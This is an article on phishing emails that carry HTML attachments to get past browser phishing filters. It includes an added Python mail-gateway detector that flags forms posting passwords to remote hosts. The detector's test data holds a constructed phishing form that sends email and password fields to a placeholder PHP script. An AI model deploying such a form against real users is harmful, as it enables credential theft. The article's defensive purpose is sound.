Phishing HTML attachments bypass browser detection

In the constant war between online crooks and security professionals, adaptability is a quality prized by both sides. They are tied together in an action-reaction cycle, with security pros at a disadvantage because they are stuck in an almost perpetual defensive role.

For someone like me who follows security issues closely, it is fascinating to watch how certain scams are modified over time.

Take, for example, the typical phishing scam. More often than not, this type of scam would start with an e-mail containing an embedded link to the phishing page. If the victim failed to spot that the e-mail doesn’t come from a legitimate source or that the page he or she landed on was spoofed, the cyber crooks won the day.

But, as much as we’re all trying to educate computer users about the various online scams, there are always those who will forget about it and click away.

It is a very good thing, then, that browsers like Firefox and Chrome are becoming more and more adept at spotting phishing pages. Indeed, they have become so successful that phishers are, once again, forced to find a new tactic.

And, according to M86 researchers, it consists of attaching an HTML file to the e-mail: once downloaded, the file is stored locally and opens in the browser without triggering any warning:

“When the victims enter their information and click the ‘Agree and Submit’ button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver,” explains the M86 researcher.

“The phisher’s PHP script then redirects the browser to Paypal’s homepage after successfully submitting stolen information. While the POST request sends information to the phisher’s remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity.”

And even though logic dictates that the browser should be able to check the URL when it sends the POST request, it doesn't, because, among other things, few such PHP URLs get reported as abuse: the URL is never visible to the user, and it takes some technical knowledge to know that it can be found in the HTML source code.

Also, since the PHP script that receives the form runs on the server and no HTML is visible once the submit button is pressed, the URLs in question are difficult to verify as phishing sites.
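A mail-gateway check for this pattern, as an added example (not M86's or the article's code): it parses an HTML attachment and flags any form that would POST a password field to a remote host, which a browser's URL blocklist never gets to see because the page itself is opened from local disk. The sample attachment and the host name in it are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormCollector(HTMLParser):
    # Records every <form> with its action/method and the <input> fields inside it.
    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(), "inputs": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append({"type": (a.get("type") or "text").lower(),
                                         "name": a.get("name") or ""})

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def analyze_attachment(html):
    """Flag forms that would POST credentials from a locally opened file to a remote host."""
    parser = _FormCollector()
    parser.feed(html)
    forms = []
    for f in parser.forms:
        target = urlparse(f["action"])
        remote = bool(target.netloc)  # absolute URL with a host, i.e. leaves the local file
        forms.append({
            "host": target.netloc,
            "remote_post": remote and f["method"] == "post",
            # a server-side script as the form target is the pattern M86 describes
            "server_script": target.path.lower().endswith((".php", ".asp", ".aspx", ".cgi")),
            "credential_fields": [i["name"] for i in f["inputs"] if i["type"] == "password"],
        })
    return {"suspicious": any(f["remote_post"] and f["credential_fields"] for f in forms),
            "forms": forms}


# Constructed sample mirroring the described attachment (placeholder host, not a real URL).
PHISHING_SAMPLE = ('<form method="POST" action="https://compromised.example.invalid/update.php">'
                   '<input type="text" name="email"><input type="password" name="pass">'
                   '<input type="submit" value="Agree and Submit"></form>')
# Constructed benign sample: a local form with no credential fields.
BENIGN_SAMPLE = ('<form action="#"><input type="text" name="q">'
                 '<input type="submit" value="Search"></form>')
```

Run `analyze_attachment` over each HTML attachment before delivery; a `suspicious` result is a reason to quarantine the message and to report the `host` to the abuse contact that the browser blocklists would otherwise never hear from.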

It seems that – once again – the ball is in the security pros’ court.
